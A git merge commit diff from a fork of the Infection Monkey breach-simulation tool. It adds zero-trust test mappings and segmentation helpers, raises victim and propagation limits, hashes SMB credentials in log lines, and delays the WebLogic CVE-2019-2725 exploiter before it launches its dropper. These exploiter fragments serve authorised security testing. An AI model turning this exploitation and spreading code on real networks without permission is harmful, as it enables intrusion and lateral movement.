forked from p15670423/monkey
Merge remote-tracking branch 'upstream/develop' into 420/blackbox
This commit is contained in:
commit
f065f30de0
|
@ -22,7 +22,7 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
|
||||||
# Other directories and paths ( most likely you dont need to configure)
|
# Other directories and paths ( most likely you dont need to configure)
|
||||||
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
|
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
|
||||||
$MONKEY_DIR = "\monkey\infection_monkey"
|
$MONKEY_DIR = "\monkey\infection_monkey"
|
||||||
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\monkey_utils\sambacry_monkey_runner"
|
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
|
||||||
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
|
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
|
||||||
$MK32_DLL = "mk32.dll"
|
$MK32_DLL = "mk32.dll"
|
||||||
$MK64_DLL = "mk64.dll"
|
$MK64_DLL = "mk64.dll"
|
||||||
|
|
|
@ -129,7 +129,7 @@ python -m pip install --user -r requirements_linux.txt || handle_error
|
||||||
# Build samba
|
# Build samba
|
||||||
log_message "Building samba binaries"
|
log_message "Building samba binaries"
|
||||||
sudo apt-get install gcc-multilib
|
sudo apt-get install gcc-multilib
|
||||||
cd ${monkey_home}/monkey/infection_monkey/monkey_utils/sambacry_monkey_runner
|
cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner
|
||||||
sudo chmod +x ./build.sh || handle_error
|
sudo chmod +x ./build.sh || handle_error
|
||||||
./build.sh
|
./build.sh
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,2 @@
|
||||||
|
from zero_trust_consts import populate_mappings
|
||||||
|
populate_mappings()
|
|
@ -0,0 +1,2 @@
|
||||||
|
ES_SERVICE = 'elastic-search-9200'
|
||||||
|
|
|
@ -0,0 +1,3 @@
|
||||||
|
POST_BREACH_COMMUNICATE_AS_NEW_USER = "Communicate as new user"
|
||||||
|
POST_BREACH_BACKDOOR_USER = "Backdoor user"
|
||||||
|
POST_BREACH_FILE_EXECUTION = "File execution"
|
|
@ -0,0 +1,205 @@
|
||||||
|
"""
|
||||||
|
This file contains all the static data relating to Zero Trust. It is mostly used in the zero trust report generation and
|
||||||
|
in creating findings.
|
||||||
|
|
||||||
|
This file contains static mappings between zero trust components such as: pillars, principles, tests, statuses.
|
||||||
|
Some of the mappings are computed when this module is loaded.
|
||||||
|
"""
|
||||||
|
|
||||||
|
AUTOMATION_ORCHESTRATION = u"Automation & Orchestration"
|
||||||
|
VISIBILITY_ANALYTICS = u"Visibility & Analytics"
|
||||||
|
WORKLOADS = u"Workloads"
|
||||||
|
DEVICES = u"Devices"
|
||||||
|
NETWORKS = u"Networks"
|
||||||
|
PEOPLE = u"People"
|
||||||
|
DATA = u"Data"
|
||||||
|
PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
|
||||||
|
|
||||||
|
STATUS_UNEXECUTED = u"Unexecuted"
|
||||||
|
STATUS_PASSED = u"Passed"
|
||||||
|
STATUS_VERIFY = u"Verify"
|
||||||
|
STATUS_FAILED = u"Failed"
|
||||||
|
# Don't change order! The statuses are ordered by importance/severity.
|
||||||
|
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
|
||||||
|
|
||||||
|
TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
|
||||||
|
TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
|
||||||
|
TEST_MACHINE_EXPLOITED = u"machine_exploited"
|
||||||
|
TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
|
||||||
|
TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
|
||||||
|
TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
|
||||||
|
TEST_SEGMENTATION = u"segmentation"
|
||||||
|
TEST_TUNNELING = u"tunneling"
|
||||||
|
TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
|
||||||
|
TESTS = (
|
||||||
|
TEST_SEGMENTATION,
|
||||||
|
TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||||
|
TEST_SCHEDULED_EXECUTION,
|
||||||
|
TEST_ENDPOINT_SECURITY_EXISTS,
|
||||||
|
TEST_MACHINE_EXPLOITED,
|
||||||
|
TEST_DATA_ENDPOINT_HTTP,
|
||||||
|
TEST_DATA_ENDPOINT_ELASTIC,
|
||||||
|
TEST_TUNNELING,
|
||||||
|
TEST_COMMUNICATE_AS_NEW_USER
|
||||||
|
)
|
||||||
|
|
||||||
|
PRINCIPLE_DATA_TRANSIT = u"data_transit"
|
||||||
|
PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
|
||||||
|
PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
|
||||||
|
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
|
||||||
|
PRINCIPLE_SEGMENTATION = u"segmentation"
|
||||||
|
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
|
||||||
|
PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
|
||||||
|
PRINCIPLES = {
|
||||||
|
PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
|
||||||
|
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
|
||||||
|
PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
|
||||||
|
PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
|
||||||
|
PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
|
||||||
|
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
|
||||||
|
PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
|
||||||
|
u"Access Control) only.",
|
||||||
|
}
|
||||||
|
|
||||||
|
POSSIBLE_STATUSES_KEY = u"possible_statuses"
|
||||||
|
PILLARS_KEY = u"pillars"
|
||||||
|
PRINCIPLE_KEY = u"principle_key"
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
|
||||||
|
TEST_EXPLANATION_KEY = u"explanation"
|
||||||
|
TESTS_MAP = {
|
||||||
|
TEST_SEGMENTATION: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
|
||||||
|
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
|
||||||
|
PILLARS_KEY: [NETWORKS],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
|
||||||
|
},
|
||||||
|
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
|
||||||
|
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||||
|
},
|
||||||
|
TEST_ENDPOINT_SECURITY_EXISTS: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
|
||||||
|
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||||
|
PILLARS_KEY: [DEVICES],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||||
|
},
|
||||||
|
TEST_MACHINE_EXPLOITED: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkey tries to exploit machines in order to breach them and propagate in the network.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
|
||||||
|
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||||
|
PILLARS_KEY: [DEVICES],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY]
|
||||||
|
},
|
||||||
|
TEST_SCHEDULED_EXECUTION: {
|
||||||
|
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
|
||||||
|
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
|
||||||
|
PILLARS_KEY: [PEOPLE, NETWORKS],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||||
|
},
|
||||||
|
TEST_DATA_ENDPOINT_ELASTIC: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
|
||||||
|
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||||
|
PILLARS_KEY: [DATA],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||||
|
},
|
||||||
|
TEST_DATA_ENDPOINT_HTTP: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to HTTP servers.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
|
||||||
|
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||||
|
PILLARS_KEY: [DATA],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||||
|
},
|
||||||
|
TEST_TUNNELING: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
||||||
|
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
|
||||||
|
},
|
||||||
|
TEST_COMMUNICATE_AS_NEW_USER: {
|
||||||
|
TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
|
||||||
|
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||||
|
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
|
||||||
|
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
|
||||||
|
},
|
||||||
|
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
||||||
|
PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
|
||||||
|
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
EVENT_TYPE_MONKEY_NETWORK = "monkey_network"
|
||||||
|
EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
|
||||||
|
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
|
||||||
|
|
||||||
|
PILLARS_TO_TESTS = {
|
||||||
|
DATA: [],
|
||||||
|
PEOPLE: [],
|
||||||
|
NETWORKS: [],
|
||||||
|
DEVICES: [],
|
||||||
|
WORKLOADS: [],
|
||||||
|
VISIBILITY_ANALYTICS: [],
|
||||||
|
AUTOMATION_ORCHESTRATION: []
|
||||||
|
}
|
||||||
|
|
||||||
|
PRINCIPLES_TO_TESTS = {}
|
||||||
|
|
||||||
|
PRINCIPLES_TO_PILLARS = {}
|
||||||
|
|
||||||
|
|
||||||
|
def populate_mappings():
|
||||||
|
populate_pillars_to_tests()
|
||||||
|
populate_principles_to_tests()
|
||||||
|
populate_principles_to_pillars()
|
||||||
|
|
||||||
|
|
||||||
|
def populate_pillars_to_tests():
|
||||||
|
for pillar in PILLARS:
|
||||||
|
for test, test_info in TESTS_MAP.items():
|
||||||
|
if pillar in test_info[PILLARS_KEY]:
|
||||||
|
PILLARS_TO_TESTS[pillar].append(test)
|
||||||
|
|
||||||
|
|
||||||
|
def populate_principles_to_tests():
|
||||||
|
for single_principle in PRINCIPLES:
|
||||||
|
PRINCIPLES_TO_TESTS[single_principle] = []
|
||||||
|
for test, test_info in TESTS_MAP.items():
|
||||||
|
PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)
|
||||||
|
|
||||||
|
|
||||||
|
def populate_principles_to_pillars():
|
||||||
|
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||||
|
principles_pillars = set()
|
||||||
|
for test in principle_tests:
|
||||||
|
for pillar in TESTS_MAP[test][PILLARS_KEY]:
|
||||||
|
principles_pillars.add(pillar)
|
||||||
|
PRINCIPLES_TO_PILLARS[principle] = principles_pillars
|
|
@ -0,0 +1,23 @@
|
||||||
|
def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
|
||||||
|
"""
|
||||||
|
Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
|
||||||
|
:param ip_addresses: List[str]: List of IP addresses to test.
|
||||||
|
:param source_subnet: NetworkRange: Subnet to want an IP to not be in.
|
||||||
|
:param target_subnet: NetworkRange: Subnet we want an IP to be in.
|
||||||
|
:return: The cross segment IP if in source but not in target, else None. Union[str, None]
|
||||||
|
"""
|
||||||
|
if get_ip_if_in_subnet(ip_addresses, target_subnet) is not None:
|
||||||
|
return None
|
||||||
|
return get_ip_if_in_subnet(ip_addresses, source_subnet)
|
||||||
|
|
||||||
|
|
||||||
|
def get_ip_if_in_subnet(ip_addresses, subnet):
|
||||||
|
"""
|
||||||
|
:param ip_addresses: IP address list.
|
||||||
|
:param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
|
||||||
|
:return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
|
||||||
|
"""
|
||||||
|
for ip_address in ip_addresses:
|
||||||
|
if subnet.is_in_range(ip_address):
|
||||||
|
return ip_address
|
||||||
|
return None
|
|
@ -0,0 +1,30 @@
|
||||||
|
from common.network.network_range import *
|
||||||
|
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
|
||||||
|
class TestSegmentationUtils(IslandTestCase):
|
||||||
|
def test_get_ip_in_src_and_not_in_dst(self):
|
||||||
|
self.fail_if_not_testing_env()
|
||||||
|
source = CidrRange("1.1.1.0/24")
|
||||||
|
target = CidrRange("2.2.2.0/24")
|
||||||
|
|
||||||
|
# IP not in both
|
||||||
|
self.assertIsNone(get_ip_in_src_and_not_in_dst(
|
||||||
|
[text_type("3.3.3.3"), text_type("4.4.4.4")], source, target
|
||||||
|
))
|
||||||
|
|
||||||
|
# IP not in source, in target
|
||||||
|
self.assertIsNone(get_ip_in_src_and_not_in_dst(
|
||||||
|
[text_type("2.2.2.2")], source, target
|
||||||
|
))
|
||||||
|
|
||||||
|
# IP in source, not in target
|
||||||
|
self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
|
||||||
|
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, target
|
||||||
|
))
|
||||||
|
|
||||||
|
# IP in both subnets
|
||||||
|
self.assertIsNone(get_ip_in_src_and_not_in_dst(
|
||||||
|
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, source
|
||||||
|
))
|
|
@ -141,10 +141,10 @@ class Configuration(object):
|
||||||
exploiter_classes = []
|
exploiter_classes = []
|
||||||
|
|
||||||
# how many victims to look for in a single scan iteration
|
# how many victims to look for in a single scan iteration
|
||||||
victims_max_find = 30
|
victims_max_find = 100
|
||||||
|
|
||||||
# how many victims to exploit before stopping
|
# how many victims to exploit before stopping
|
||||||
victims_max_exploit = 7
|
victims_max_exploit = 15
|
||||||
|
|
||||||
# depth of propagation
|
# depth of propagation
|
||||||
depth = 2
|
depth = 2
|
||||||
|
@ -199,7 +199,7 @@ class Configuration(object):
|
||||||
9200]
|
9200]
|
||||||
tcp_target_ports.extend(HTTP_PORTS)
|
tcp_target_ports.extend(HTTP_PORTS)
|
||||||
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
tcp_scan_timeout = 3000 # 3000 Milliseconds
|
||||||
tcp_scan_interval = 0
|
tcp_scan_interval = 0 # in milliseconds
|
||||||
tcp_scan_get_banner = True
|
tcp_scan_get_banner = True
|
||||||
|
|
||||||
# Ping Scanner
|
# Ping Scanner
|
||||||
|
|
|
@ -97,8 +97,8 @@
|
||||||
],
|
],
|
||||||
"timeout_between_iterations": 10,
|
"timeout_between_iterations": 10,
|
||||||
"use_file_logging": true,
|
"use_file_logging": true,
|
||||||
"victims_max_exploit": 7,
|
"victims_max_exploit": 15,
|
||||||
"victims_max_find": 30,
|
"victims_max_find": 100,
|
||||||
"post_breach_actions" : []
|
"post_breach_actions" : []
|
||||||
custom_PBA_linux_cmd = ""
|
custom_PBA_linux_cmd = ""
|
||||||
custom_PBA_windows_cmd = ""
|
custom_PBA_windows_cmd = ""
|
||||||
|
|
|
@ -10,7 +10,8 @@ import requests
|
||||||
from infection_monkey.exploit.web_rce import WebRCE
|
from infection_monkey.exploit.web_rce import WebRCE
|
||||||
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
|
from infection_monkey.model import WGET_HTTP_UPLOAD, BITSADMIN_CMDLINE_HTTP, CHECK_COMMAND, ID_STRING, CMD_PREFIX,\
|
||||||
DOWNLOAD_TIMEOUT
|
DOWNLOAD_TIMEOUT
|
||||||
from infection_monkey.network.elasticfinger import ES_PORT, ES_SERVICE
|
from infection_monkey.network.elasticfinger import ES_PORT
|
||||||
|
from common.data.network_consts import ES_SERVICE
|
||||||
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
|
from infection_monkey.telemetry.attack.t1197_telem import T1197Telem
|
||||||
from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING
|
from common.utils.attack_utils import ScanStatus, BITS_UPLOAD_STRING
|
||||||
|
|
||||||
|
|
|
@ -10,6 +10,7 @@ from infection_monkey.exploit import HostExploiter
|
||||||
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
|
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
|
||||||
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
|
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
|
||||||
from infection_monkey.model import DROPPER_ARG
|
from infection_monkey.model import DROPPER_ARG
|
||||||
|
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||||
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
|
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
|
||||||
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError
|
||||||
|
|
||||||
|
|
|
@ -68,8 +68,12 @@ class SmbExploiter(HostExploiter):
|
||||||
self._config.smb_download_timeout)
|
self._config.smb_download_timeout)
|
||||||
|
|
||||||
if remote_full_path is not None:
|
if remote_full_path is not None:
|
||||||
LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : %s : %s)",
|
LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)",
|
||||||
self.host, user, self._config.hash_sensitive_data(password), lm_hash, ntlm_hash)
|
self.host,
|
||||||
|
user,
|
||||||
|
self._config.hash_sensitive_data(password),
|
||||||
|
self._config.hash_sensitive_data(lm_hash),
|
||||||
|
self._config.hash_sensitive_data(ntlm_hash))
|
||||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||||
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
|
self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1],
|
||||||
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
|
SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1]))
|
||||||
|
@ -80,9 +84,15 @@ class SmbExploiter(HostExploiter):
|
||||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Exception when trying to copy file using SMB to %r with user:"
|
LOG.debug(
|
||||||
" %s, password (SHA-512): '%s', LM hash: %s, NTLM hash: %s: (%s)", self.host,
|
"Exception when trying to copy file using SMB to %r with user:"
|
||||||
user, self._config.hash_sensitive_data(password), lm_hash, ntlm_hash, exc)
|
" %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: (%s)",
|
||||||
|
self.host,
|
||||||
|
user,
|
||||||
|
self._config.hash_sensitive_data(password),
|
||||||
|
self._config.hash_sensitive_data(lm_hash),
|
||||||
|
self._config.hash_sensitive_data(ntlm_hash),
|
||||||
|
exc)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if not exploited:
|
if not exploited:
|
||||||
|
@ -92,7 +102,8 @@ class SmbExploiter(HostExploiter):
|
||||||
# execute the remote dropper in case the path isn't final
|
# execute the remote dropper in case the path isn't final
|
||||||
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
|
||||||
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
|
cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \
|
||||||
build_monkey_commandline(self.host, get_monkey_depth() - 1, self._config.dropper_target_path_win_32)
|
build_monkey_commandline(self.host, get_monkey_depth() - 1,
|
||||||
|
self._config.dropper_target_path_win_32)
|
||||||
else:
|
else:
|
||||||
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
|
cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \
|
||||||
build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||||
|
|
|
@ -11,7 +11,7 @@ import infection_monkey.monkeyfs as monkeyfs
|
||||||
from common.utils.attack_utils import ScanStatus
|
from common.utils.attack_utils import ScanStatus
|
||||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||||
|
from infection_monkey.config import Configuration
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
@ -31,9 +31,13 @@ class SmbTools(object):
|
||||||
|
|
||||||
# skip guest users
|
# skip guest users
|
||||||
if smb.isGuestSession() > 0:
|
if smb.isGuestSession() > 0:
|
||||||
LOG.debug("Connection to %r granted guest privileges with user: %s, password: '%s',"
|
LOG.debug("Connection to %r granted guest privileges with user: %s, password (SHA-512): '%s',"
|
||||||
" LM hash: %s, NTLM hash: %s",
|
" LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
|
||||||
host, username, password, lm_hash, ntlm_hash)
|
host,
|
||||||
|
username,
|
||||||
|
Configuration.hash_sensitive_data(password),
|
||||||
|
Configuration.hash_sensitive_data(lm_hash),
|
||||||
|
Configuration.hash_sensitive_data(ntlm_hash))
|
||||||
|
|
||||||
try:
|
try:
|
||||||
smb.logoff()
|
smb.logoff()
|
||||||
|
@ -164,9 +168,13 @@ class SmbTools(object):
|
||||||
smb = None
|
smb = None
|
||||||
|
|
||||||
if not file_uploaded:
|
if not file_uploaded:
|
||||||
LOG.debug("Couldn't find a writable share for exploiting"
|
LOG.debug("Couldn't find a writable share for exploiting victim %r with "
|
||||||
" victim %r with username: %s, password: '%s', LM hash: %s, NTLM hash: %s",
|
"username: %s, password (SHA-512): '%s', LM hash (SHA-512): %s, NTLM hash (SHA-512): %s",
|
||||||
host, username, password, lm_hash, ntlm_hash)
|
host,
|
||||||
|
username,
|
||||||
|
Configuration.hash_sensitive_data(password),
|
||||||
|
Configuration.hash_sensitive_data(lm_hash),
|
||||||
|
Configuration.hash_sensitive_data(ntlm_hash))
|
||||||
return None
|
return None
|
||||||
|
|
||||||
return remote_full_path
|
return remote_full_path
|
||||||
|
@ -194,8 +202,15 @@ class SmbTools(object):
|
||||||
try:
|
try:
|
||||||
smb.login(username, password, '', lm_hash, ntlm_hash)
|
smb.login(username, password, '', lm_hash, ntlm_hash)
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error while logging into %r using user: %s, password: '%s', LM hash: %s, NTLM hash: %s: %s",
|
LOG.debug(
|
||||||
host, username, password, lm_hash, ntlm_hash, exc)
|
"Error while logging into %r using user: %s, password (SHA-512): '%s', "
|
||||||
|
"LM hash (SHA-512): %s, NTLM hash (SHA-512): %s: %s",
|
||||||
|
host,
|
||||||
|
username,
|
||||||
|
Configuration.hash_sensitive_data(password),
|
||||||
|
Configuration.hash_sensitive_data(lm_hash),
|
||||||
|
Configuration.hash_sensitive_data(ntlm_hash),
|
||||||
|
exc)
|
||||||
return None, dialect
|
return None, dialect
|
||||||
|
|
||||||
smb.setTimeout(timeout)
|
smb.setTimeout(timeout)
|
||||||
|
|
|
@ -252,6 +252,7 @@ class WebLogic201710271(WebRCE):
|
||||||
# https://github.com/rapid7/metasploit-framework/pull/11780
|
# https://github.com/rapid7/metasploit-framework/pull/11780
|
||||||
class WebLogic20192725(WebRCE):
|
class WebLogic20192725(WebRCE):
|
||||||
URLS = ["_async/AsyncResponseServiceHttps"]
|
URLS = ["_async/AsyncResponseServiceHttps"]
|
||||||
|
DELAY_BEFORE_EXPLOITING_SECONDS = 5
|
||||||
|
|
||||||
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
_TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
|
||||||
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
_EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
|
||||||
|
@ -266,6 +267,11 @@ class WebLogic20192725(WebRCE):
|
||||||
exploit_config['dropper'] = True
|
exploit_config['dropper'] = True
|
||||||
return exploit_config
|
return exploit_config
|
||||||
|
|
||||||
|
def execute_remote_monkey(self, url, path, dropper=False):
|
||||||
|
# Without delay exploiter tries to launch monkey file that is still finishing up after downloading.
|
||||||
|
time.sleep(WebLogic20192725.DELAY_BEFORE_EXPLOITING_SECONDS)
|
||||||
|
super(WebLogic20192725, self).execute_remote_monkey(url, path, dropper)
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
if 'linux' in self.host.os['type']:
|
if 'linux' in self.host.os['type']:
|
||||||
